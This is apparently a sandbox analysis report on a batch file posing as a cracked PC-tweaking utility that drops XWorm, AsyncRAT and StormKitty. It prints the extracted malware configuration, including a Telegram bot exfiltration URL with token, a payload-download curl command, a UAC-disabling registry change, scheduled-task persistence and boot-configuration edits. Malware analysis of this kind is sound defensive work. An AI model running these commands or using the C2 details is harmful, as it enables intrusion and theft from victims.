asyncrat | 16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca

Analysis

max time kernel
120s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
19-07-2024 05:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
Size

672KB
MD5

f9ca73d63fe61c4c401528fb470ce08e
SHA1

584f69b507ddf33985673ee612e6099aff760fb1
SHA256

16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca
SHA512

6fd03320ec84baf09a16a127c2c0ed3c265906fcb1a3b807c13001e775c396b66539238392438a8f290be04b8b8684050736331f8f99dbe8b868b44f154dd9de
SSDEEP

3072:BIGzQbmbkAqA2xH7VkKEn14IZVvisLur+K3:BIGiVNEn14IZVvisL43

Score

10^/10

asyncrat stormkitty xworm default evasion execution persistence privilege_escalation pyinstaller ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%LocalAppData%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/ZnhxAV6a
telegram
https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023464-78.dat	family_xworm
behavioral2/memory/548-93-0x0000000000760000-0x000000000077E000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023465-89.dat	family_stormkitty
behavioral2/memory/1084-98-0x0000000000610000-0x000000000064E000-memory.dmp	family_stormkitty

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0007000000023465-89.dat	family_asyncrat

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1608	bcdedit.exe
1072	bcdedit.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	EXMservice.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	svchost.exe

Executes dropped EXE 7 IoCs

pid	Process
2900	EXMservice.exe
548	svchost.exe
1084	dllhost.exe
3900	svchost.exe
5072	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
1852	svchost.exe

Loads dropped DLL 15 IoCs

pid	Process
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe
3252	Fortnite_Settings.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe"	svchost.exe

Drops desktop.ini file(s) 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\dad8aace3e1c81a875a8b1977f586f36\Admin@QIVBHIQT_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	dllhost.exe
File created	C:\Users\Admin\AppData\Local\dad8aace3e1c81a875a8b1977f586f36\Admin@QIVBHIQT_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	dllhost.exe
File opened for modification	C:\Users\Admin\AppData\Local\dad8aace3e1c81a875a8b1977f586f36\Admin@QIVBHIQT_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	dllhost.exe
File created	C:\Users\Admin\AppData\Local\dad8aace3e1c81a875a8b1977f586f36\Admin@QIVBHIQT_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini	dllhost.exe
File created	C:\Users\Admin\AppData\Local\dad8aace3e1c81a875a8b1977f586f36\Admin@QIVBHIQT_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini	dllhost.exe
File opened for modification	C:\Users\Admin\AppData\Local\dad8aace3e1c81a875a8b1977f586f36\Admin@QIVBHIQT_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	dllhost.exe
File created	C:\Users\Admin\AppData\Local\dad8aace3e1c81a875a8b1977f586f36\Admin@QIVBHIQT_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	dllhost.exe
File opened for modification	C:\Users\Admin\AppData\Local\dad8aace3e1c81a875a8b1977f586f36\Admin@QIVBHIQT_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	dllhost.exe
File created	C:\Users\Admin\AppData\Local\dad8aace3e1c81a875a8b1977f586f36\Admin@QIVBHIQT_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	dllhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
36	pastebin.com
37	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
56	icanhazip.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4796	powershell.exe
5092	powershell.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0007000000023458-291.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	dllhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	dllhost.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
212	timeout.exe
3112	timeout.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry

T1112

pid	Process
1468	reg.exe
924	reg.exe
3792	reg.exe
748	reg.exe
2488	reg.exe
1292	reg.exe
892	reg.exe
1964	reg.exe
2052	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4240	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
5092	powershell.exe
5092	powershell.exe
4796	powershell.exe
4796	powershell.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe
1084	dllhost.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeIncreaseQuotaPrivilege	3904	WMIC.exe
Token: SeSecurityPrivilege	3904	WMIC.exe
Token: SeTakeOwnershipPrivilege	3904	WMIC.exe
Token: SeLoadDriverPrivilege	3904	WMIC.exe
Token: SeSystemProfilePrivilege	3904	WMIC.exe
Token: SeSystemtimePrivilege	3904	WMIC.exe
Token: SeProfSingleProcessPrivilege	3904	WMIC.exe
Token: SeIncBasePriorityPrivilege	3904	WMIC.exe
Token: SeCreatePagefilePrivilege	3904	WMIC.exe
Token: SeBackupPrivilege	3904	WMIC.exe
Token: SeRestorePrivilege	3904	WMIC.exe
Token: SeShutdownPrivilege	3904	WMIC.exe
Token: SeDebugPrivilege	3904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3904	WMIC.exe
Token: SeRemoteShutdownPrivilege	3904	WMIC.exe
Token: SeUndockPrivilege	3904	WMIC.exe
Token: SeManageVolumePrivilege	3904	WMIC.exe
Token: 33	3904	WMIC.exe
Token: 34	3904	WMIC.exe
Token: 35	3904	WMIC.exe
Token: 36	3904	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3904	WMIC.exe
Token: SeSecurityPrivilege	3904	WMIC.exe
Token: SeTakeOwnershipPrivilege	3904	WMIC.exe
Token: SeLoadDriverPrivilege	3904	WMIC.exe
Token: SeSystemProfilePrivilege	3904	WMIC.exe
Token: SeSystemtimePrivilege	3904	WMIC.exe
Token: SeProfSingleProcessPrivilege	3904	WMIC.exe
Token: SeIncBasePriorityPrivilege	3904	WMIC.exe
Token: SeCreatePagefilePrivilege	3904	WMIC.exe
Token: SeBackupPrivilege	3904	WMIC.exe
Token: SeRestorePrivilege	3904	WMIC.exe
Token: SeShutdownPrivilege	3904	WMIC.exe
Token: SeDebugPrivilege	3904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3904	WMIC.exe
Token: SeRemoteShutdownPrivilege	3904	WMIC.exe
Token: SeUndockPrivilege	3904	WMIC.exe
Token: SeManageVolumePrivilege	3904	WMIC.exe
Token: 33	3904	WMIC.exe
Token: 34	3904	WMIC.exe
Token: 35	3904	WMIC.exe
Token: 36	3904	WMIC.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	548	svchost.exe
Token: SeDebugPrivilege	1084	dllhost.exe
Token: SeDebugPrivilege	548	svchost.exe
Token: SeDebugPrivilege	3900	svchost.exe
Token: SeDebugPrivilege	3252	Fortnite_Settings.exe
Token: SeDebugPrivilege	1852	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5116 wrote to memory of 4120	5116	cmd.exe	85
PID 5116 wrote to memory of 4120	5116	cmd.exe	85
PID 5116 wrote to memory of 4508	5116	cmd.exe	86
PID 5116 wrote to memory of 4508	5116	cmd.exe	86
PID 5116 wrote to memory of 1528	5116	cmd.exe	87
PID 5116 wrote to memory of 1528	5116	cmd.exe	87
PID 5116 wrote to memory of 5092	5116	cmd.exe	88
PID 5116 wrote to memory of 5092	5116	cmd.exe	88
PID 5116 wrote to memory of 780	5116	cmd.exe	94
PID 5116 wrote to memory of 780	5116	cmd.exe	94
PID 5116 wrote to memory of 1424	5116	cmd.exe	95
PID 5116 wrote to memory of 1424	5116	cmd.exe	95
PID 5116 wrote to memory of 3160	5116	cmd.exe	96
PID 5116 wrote to memory of 3160	5116	cmd.exe	96
PID 3160 wrote to memory of 3904	3160	cmd.exe	97
PID 3160 wrote to memory of 3904	3160	cmd.exe	97
PID 3160 wrote to memory of 5080	3160	cmd.exe	98
PID 3160 wrote to memory of 5080	3160	cmd.exe	98
PID 5116 wrote to memory of 2724	5116	cmd.exe	99
PID 5116 wrote to memory of 2724	5116	cmd.exe	99
PID 5116 wrote to memory of 1652	5116	cmd.exe	106
PID 5116 wrote to memory of 1652	5116	cmd.exe	106
PID 5116 wrote to memory of 3412	5116	cmd.exe	107
PID 5116 wrote to memory of 3412	5116	cmd.exe	107
PID 5116 wrote to memory of 4796	5116	cmd.exe	109
PID 5116 wrote to memory of 4796	5116	cmd.exe	109
PID 5116 wrote to memory of 2900	5116	cmd.exe	110
PID 5116 wrote to memory of 2900	5116	cmd.exe	110
PID 2900 wrote to memory of 548	2900	EXMservice.exe	111
PID 2900 wrote to memory of 548	2900	EXMservice.exe	111
PID 2900 wrote to memory of 1084	2900	EXMservice.exe	112
PID 2900 wrote to memory of 1084	2900	EXMservice.exe	112
PID 2900 wrote to memory of 1084	2900	EXMservice.exe	112
PID 5116 wrote to memory of 3516	5116	cmd.exe	113
PID 5116 wrote to memory of 3516	5116	cmd.exe	113
PID 548 wrote to memory of 4240	548	svchost.exe	114
PID 548 wrote to memory of 4240	548	svchost.exe	114
PID 1084 wrote to memory of 4688	1084	dllhost.exe	117
PID 1084 wrote to memory of 4688	1084	dllhost.exe	117
PID 1084 wrote to memory of 4688	1084	dllhost.exe	117
PID 4688 wrote to memory of 1304	4688	cmd.exe	119
PID 4688 wrote to memory of 1304	4688	cmd.exe	119
PID 4688 wrote to memory of 1304	4688	cmd.exe	119
PID 4688 wrote to memory of 2200	4688	cmd.exe	120
PID 4688 wrote to memory of 2200	4688	cmd.exe	120
PID 4688 wrote to memory of 2200	4688	cmd.exe	120
PID 4688 wrote to memory of 4448	4688	cmd.exe	121
PID 4688 wrote to memory of 4448	4688	cmd.exe	121
PID 4688 wrote to memory of 4448	4688	cmd.exe	121
PID 1084 wrote to memory of 4416	1084	dllhost.exe	122
PID 1084 wrote to memory of 4416	1084	dllhost.exe	122
PID 1084 wrote to memory of 4416	1084	dllhost.exe	122
PID 4416 wrote to memory of 4064	4416	cmd.exe	124
PID 4416 wrote to memory of 4064	4416	cmd.exe	124
PID 4416 wrote to memory of 4064	4416	cmd.exe	124
PID 4416 wrote to memory of 2408	4416	cmd.exe	125
PID 4416 wrote to memory of 2408	4416	cmd.exe	125
PID 4416 wrote to memory of 2408	4416	cmd.exe	125
PID 5116 wrote to memory of 1608	5116	cmd.exe	129
PID 5116 wrote to memory of 1608	5116	cmd.exe	129
PID 5116 wrote to memory of 1072	5116	cmd.exe	130
PID 5116 wrote to memory of 1072	5116	cmd.exe	130
PID 5116 wrote to memory of 896	5116	cmd.exe	131
PID 5116 wrote to memory of 896	5116	cmd.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5116
- C:\Windows\system32\reg.exe
  Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
  2⤵
  PID:4120
- C:\Windows\system32\reg.exe
  Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
  2⤵
  PID:4508
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
  2⤵
  PID:1528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5092
- C:\Windows\system32\reg.exe
  Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
  2⤵
  - UAC bypass
  PID:780
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
  2⤵
  PID:1424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3160
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path Win32_UserAccount where name="Admin" get sid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3904
- - C:\Windows\system32\findstr.exe
    findstr "S-"
    3⤵
    PID:5080
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:2724
- C:\Windows\system32\chcp.com
  chcp 437
  2⤵
  PID:1652
- C:\Windows\system32\curl.exe
  curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"
  2⤵
  PID:3412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4796
- C:\exm\EXMservice.exe
  EXMservice.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Users\Admin\AppData\Local\svchost.exe
    "C:\Users\Admin\AppData\Local\svchost.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Local\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4240
- - C:\Users\Admin\AppData\Local\dllhost.exe
    "C:\Users\Admin\AppData\Local\dllhost.exe"
    3⤵
    - Executes dropped EXE
    - Drops desktop.ini file(s)
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1084
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4688
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:1304
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2200
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        5⤵
        
        PID:4448
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4416
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4064
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2408
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:3516
- C:\Windows\system32\bcdedit.exe
  bcdedit /set allowedinmemorysettings 0x0
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1608
- C:\Windows\system32\bcdedit.exe
  bcdedit /set isolatedcontext No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1072
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" /v "DistributeTimers" /t REG_DWORD /d "1" /f
  2⤵
  PID:896
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" /v "DisableTsx" /t REG_DWORD /d "0" /f
  2⤵
  PID:3504
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerThrottling" /v "PowerThrottlingOff" /t REG_DWORD /d "1" /f
  2⤵
  PID:2412
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v "CoalescingTimerInterval" /t REG_DWORD /d "0" /f
  2⤵
  PID:3412
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "EnergyEstimationEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:1300
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "EventProcessorEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:3956
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Keyboard" /v "KeyboardDelay" /t REG_SZ /d "0" /f
  2⤵
  PID:2092
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:212
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Keyboard" /v "KeyboardSpeed" /t REG_SZ /d "31" /f
  2⤵
  PID:3940
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Keyboard" /v "KeyboardDelay" /t REG_SZ /d "0" /f
  2⤵
  PID:1260
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3112
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Keyboard" /v "KeyboardSpeed" /t REG_SZ /d "31" /f
  2⤵
  PID:3612
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Parameters" /v "MouseDataQueueSize" /t REG_DWORD /d "21" /f
  2⤵
  PID:4800
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\kbdclass\Parameters" /v "KeyboardDataQueueSize" /t REG_DWORD /d "21" /f
  2⤵
  PID:4416
- C:\exm\FortniteSettings\Fortnite_Settings.exe
  C:\exm\FortniteSettings\Fortnite_Settings.exe
  2⤵
  - Executes dropped EXE
  PID:5072
- - C:\exm\FortniteSettings\Fortnite_Settings.exe
    C:\exm\FortniteSettings\Fortnite_Settings.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:3252
- C:\Windows\system32\reg.exe
  Reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Power /v Class2InitialUnparkCount /t REG_DWORD /d 100 /f
  2⤵
  - Modifies registry key
  PID:2488
- C:\Windows\system32\reg.exe
  Reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Power /v EnergyEstimationDisabled /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:1468
- C:\Windows\system32\reg.exe
  Reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PerfBoostAtGuaranteed /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:3792
- C:\Windows\system32\reg.exe
  Reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PpmMfBufferingThreshold /t REG_DWORD /d 0 /f
  2⤵
  - Modifies registry key
  PID:924
- C:\Windows\system32\reg.exe
  Reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Power /v MfOverridesDisabled /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:748
- C:\Windows\system32\reg.exe
  Reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PpmMfOverridesDisabled /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:1292
- C:\Windows\system32\reg.exe
  Reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Power /v UserBatteryDischargeEstimator /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:892
- C:\Windows\system32\reg.exe
  Reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerThrottlingOff /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:1964
- C:\Windows\system32\reg.exe
  Reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerThrottling /v PowerThrottlingOff /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:2052

C:\Users\Admin\AppData\Local\svchost.exe
C:\Users\Admin\AppData\Local\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3900

C:\Users\Admin\AppData\Local\svchost.exe
C:\Users\Admin\AppData\Local\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50722\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50722\_bz2.pyd

Filesize
81KB

MD5
bbe89cf70b64f38c67b7bf23c0ea8a48

SHA1
44577016e9c7b463a79b966b67c3ecc868957470

SHA256
775fbc6e9a4c7e9710205157350f3d6141b5a9e8f44cb07b3eac38f2789c8723

SHA512
3ee72ba60541116bbca1a62db64074276d40ad8ed7d0ca199a9c51d65c3f0762a8ef6d0e1e9ebf04bf4efe1347f120e4bc3d502dd288339b4df646a59aad0ec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50722\_ctypes.pyd

Filesize
119KB

MD5
ca4cef051737b0e4e56b7d597238df94

SHA1
